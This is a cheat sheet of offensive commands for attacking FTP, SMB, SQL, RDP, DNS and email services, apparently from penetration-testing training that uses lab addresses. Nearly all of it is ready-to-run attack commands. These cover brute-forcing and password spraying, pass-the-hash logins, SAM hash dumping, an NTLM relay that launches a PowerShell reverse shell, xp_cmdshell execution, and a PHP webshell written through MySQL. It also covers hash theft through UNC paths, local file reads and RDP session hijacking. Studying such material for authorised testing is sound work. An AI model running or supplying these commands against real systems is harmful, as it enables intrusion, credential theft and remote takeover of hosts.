ATTACKING COMMON SERVICES

CHEAT SHEET
Attacking FTP

Command Description

ftp 192.168.2.142 Connecting to the FTP server

using the ftp client.

nc -v 192.168.2.142 21 Connecting to the FTP server

using netcat.

hydra -l user1 -P Brute-forcing the FTP service.

/usr/share/wordlists/rockyou.txt
ftp://192.168.2.142

Attacking SMB

Command Description

smbclient -N -L //10.129.14.128 Null-session testing against

the SMB service.

smbmap -H 10.129.14.128 Network share enumeration

using smbmap.

smbmap -H 10.129.14.128 -r notes Recursive network share

enumeration using smbmap.

smbmap -H 10.129.14.128 --download Download a specific file from

"notes\note.txt" the shared folder.
Command Description

smbmap -H 10.129.14.128 --upload test.txt Upload a specific file to the

"notes\test.txt" shared folder.

rpcclient -U'%' 10.10.110.17 Null-session with the

rpcclient.

./enum4linux-ng.py 10.10.11.45 -A -C Automated enumeratition of

the SMB service using
enum4linux-ng.

crackmapexec smb 10.10.110.17 -u Password spraying against

/tmp/userlist.txt -p 'Company01!' different users from a list.

impacket-psexec Connect to the SMB service

administrator:'Password123!'@10.10.110.17 using the impacket-psexec.

crackmapexec smb 10.10.110.17 -u Administrator - Execute a command over the

p 'Password123!' -x 'whoami' --exec-method SMB service using
smbexec
crackmapexec.

crackmapexec smb 10.10.110.0/24 -u administrator Enumerating Logged-on

-p 'Password123!' --loggedon-users users.

crackmapexec smb 10.10.110.17 -u administrator - Extract hashes from the SAM

p 'Password123!' --sam database.

crackmapexec smb 10.10.110.17 -u Administrator - Use the Pass-The-Hash

H 2B576ACBE6BCFDA7294D6BD18041B8FE technique to authenticate on
the target host.

impacket-ntlmrelayx --no-http-server - Dump the SAM database

smb2support -t 10.10.110.146 using impacket-ntlmrelayx.

impacket-ntlmrelayx --no-http-server - Execute a PowerShell based

smb2support -t 192.168.220.146 -c 'powershell -e reverse shell using impacket-
<base64 reverse shell>
ntlmrelayx.

Attacking SQL Databases

Command Description
Command Description

mysql -u julio -pPassword123 -h Connecting to the MySQL server.

10.129.20.13

sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P Connecting to the MSSQL server.

'MyPassword!' -y 30 -Y 30

sqsh -S 10.129.203.7 -U julio -P Connecting to the MSSQL server from

'MyPassword!' -h Linux.

sqsh -S 10.129.203.7 -U .\\julio -P Connecting to the MSSQL server from

'MyPassword!' -h Linux while Windows Authentication
mechanism is used by the MSSQL
server.

mysql> SHOW DATABASES; Show all available databases in

MySQL.

mysql> USE htbusers; Select a specific database in MySQL.

mysql> SHOW TABLES; Show all available tables in the

selected database in MySQL.

mysql> SELECT * FROM users; Select all available entries from the
"users" table in MySQL.

sqlcmd> SELECT name FROM Show all available databases in

master.dbo.sysdatabases MSSQL.

sqlcmd> USE htbusers Select a specific database in MSSQL.

sqlcmd> SELECT * FROM Show all available tables in the

htbusers.INFORMATION_SCHEMA.TABLES selected database in MSSQL.

sqlcmd> SELECT * FROM users Select all available entries from the
"users" table in MSSQL.

sqlcmd> EXECUTE sp_configure 'show To allow advanced options to be

advanced options', 1 changed.

sqlcmd> EXECUTE sp_configure To enable the xp_cmdshell.

'xp_cmdshell', 1
Command Description

sqlcmd> RECONFIGURE To be used after each sp_configure

command to apply the changes.

sqlcmd> xp_cmdshell 'whoami' Execute a system command from

MSSQL server.

mysql> SELECT "<?php echo Create a file using MySQL.

shell_exec($_GET['c']);?>" INTO OUTFILE
'/var/www/html/webshell.php'

mysql> show variables like Check if the the secure file privileges
"secure_file_priv"; are empty to read locally stored files
on the system.

sqlcmd> SELECT * FROM OPENROWSET(BULK Read local files in MSSQL.

N'C:/Windows/System32/drivers/etc/hosts',
SINGLE_CLOB) AS Contents

mysql> select LOAD_FILE("/etc/passwd"); Read local files in MySQL.

sqlcmd> EXEC master..xp_dirtree Hash stealing using the xp_dirtree

'\\10.10.110.17\share\' command in MSSQL.

sqlcmd> EXEC master..xp_subdirs Hash stealing using the xp_subdirs

'\\10.10.110.17\share\' command in MSSQL.

sqlcmd> SELECT srvname, isremote FROM Identify linked servers in MSSQL.

sysservers

sqlcmd> EXECUTE('select @@servername, Identify the user and its privileges

@@version, system_user, used for the remote connection in
is_srvrolemember(''sysadmin'')') AT
[10.0.0.12\SQLEXPRESS] MSSQL.

Attacking RDP

Command Description

crowbar -b rdp -s 192.168.220.142/32 -U Password spraying against the

users.txt -c 'password123' RDP service.
Command Description

hydra -L usernames.txt -p 'password123' Brute-forcing the RDP service.

192.168.2.143 rdp

rdesktop -u admin -p password123 Connect to the RDP service using

192.168.2.143 rdesktop in Linux.

tscon #{TARGET_SESSION_ID} /dest:# Impersonate a user without its

{OUR_SESSION_NAME} password.

net start sessionhijack Execute the RDP session hijack.

reg add Enable "Restricted Admin Mode"

HKLM\System\CurrentControlSet\Control\Lsa on the target Windows host.
/t REG_DWORD /v DisableRestrictedAdmin /d
0x0 /f

xfreerdp /v:192.168.2.141 /u:admin Use the Pass-The-Hash technique

/pth:A9FDFA038C4B75EBC76DC855DD74F0DA to login on the target host without a
password.

Attacking DNS

Command Description

dig AXFR @ns1.inlanefreight.htb Perform an AXFR zone transfer attempt against

inlanefreight.htb a specific name server.

subfinder -d inlanefreight.com - Brute-forcing subdomains.

v

host support.inlanefreight.com DNS lookup for the specified subdomain.

Attacking Email Services

Command Description

host -t MX microsoft.com DNS lookup for mail

servers for the specified
domain.
Command Description

dig mx inlanefreight.com | grep "MX" | grep -v ";" DNS lookup for mail
servers for the specified
domain.

host -t A mail1.inlanefreight.htb. DNS lookup of the IPv4

address for the specified
subdomain.

telnet 10.10.110.20 25 Connect to the SMTP

server.

smtp-user-enum -M RCPT -U userlist.txt -D SMTP user enumeration

inlanefreight.htb -t 10.129.203.7 using the RCPT command
against the specified host.

python3 o365spray.py --validate --domain Verify the usage of

msplaintext.xyz Office365 for the specified
domain.

python3 o365spray.py --enum -U users.txt --domain Enumerate existing users

msplaintext.xyz using Office365 on the
specified domain.

python3 o365spray.py --spray -U usersfound.txt -p Password spraying against

'March2022!' --count 1 --lockout 1 --domain a list of users that use
msplaintext.xyz
Office365 for the specified
domain.

hydra -L users.txt -p 'Company01!' -f 10.10.110.20 Brute-forcing the POP3

pop3 service.

swaks --from [email protected] --to Testing the SMTP service

[email protected] --header 'Subject: for the open-relay
Notification' --body 'Message' --server
10.10.11.213 vulnerability.